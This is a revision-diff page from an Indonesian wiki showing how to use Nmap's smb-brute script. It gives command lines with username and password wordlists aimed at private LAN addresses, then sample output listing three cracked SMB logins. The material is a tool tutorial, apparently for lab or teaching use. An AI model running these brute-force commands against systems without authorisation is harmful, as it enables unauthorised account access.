Difference between revisions of "Nmap: brute force hack smb password"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 16: | Line 16: | ||
nmap --script smb-brute.nse -p445 <host> | nmap --script smb-brute.nse -p445 <host> | ||
sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host> | sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host> | ||
+ | Nmap –p445 –script smb-brute.nse –script-args userdb=user.txt,passdb=pass.txt 192.168.1.105 | ||
contoh | contoh | ||
Line 22: | Line 23: | ||
nmap --script smb-brute.nse -p445 192.168.0.80 | nmap --script smb-brute.nse -p445 192.168.0.80 | ||
nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.0.80 | nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.0.80 | ||
+ | Nmap –p445 –script smb-brute.nse –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105 | ||
==Contoh Output== | ==Contoh Output== |
Revision as of 07:38, 1 June 2018
Sumber: https://nmap.org/nsedoc/scripts/smb-brute.html
File smb-brute
Script types: hostrule Categories: intrusive, brute Download: http://nmap.org/svn/scripts/smb-brute.nse
User Summary
Upaya untuk menebak kombinasi username / password lebih dari SMB, menyimpan kombinasi ditemukan untuk digunakan dalam skrip lainnya. Setiap upaya akan dilakukan untuk mendapatkan daftar valid dari pengguna dan untuk memverifikasi setiap nama pengguna sebelum benar-benar menggunakan mereka. Ketika nama pengguna ditemukan, selain dicetak, juga disimpan dalam registri Nmap skrip sehingga lainnya Nmap dapat menggunakannya. Itu berarti bahwa jika Anda akan menjalankan smb-brute.nse, Anda harus menjalankan skrip smb lain yang Anda inginkan. Ini memeriksa password dengan cara case-sensitive, menentukan kasus setelah password ditemukan, untuk Windows versi sebelumnya Vista.
Contoh Penggunaan
nmap --script smb-brute.nse -p445 <host> sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host> Nmap –p445 –script smb-brute.nse –script-args userdb=user.txt,passdb=pass.txt 192.168.1.105
contoh
nmap --script smb-brute.nse -p445 192.168.0.7 nmap --script smb-brute.nse -p445 192.168.0.80 nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.0.80 Nmap –p445 –script smb-brute.nse –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105
Contoh Output
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 06:01 WIB Nmap scan report for 192.168.0.7 Host is up (0.0045s latency). Not shown: 989 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 873/tcp open rsync 8873/tcp open dxspider 9001/tcp open tor-orport 9050/tcp open tor-socks 9090/tcp open zeus-admin 22939/tcp open unknown MAC Address: 4C:E6:76:1F:15:4C (Buffalo) Host script results: | smb-brute: | derry:123456789 => Valid credentials | onno:123456789 => Valid credentials |_ reza:123456789 => Valid credentials Nmap done: 1 IP address (1 host up) scanned in 132.91 seconds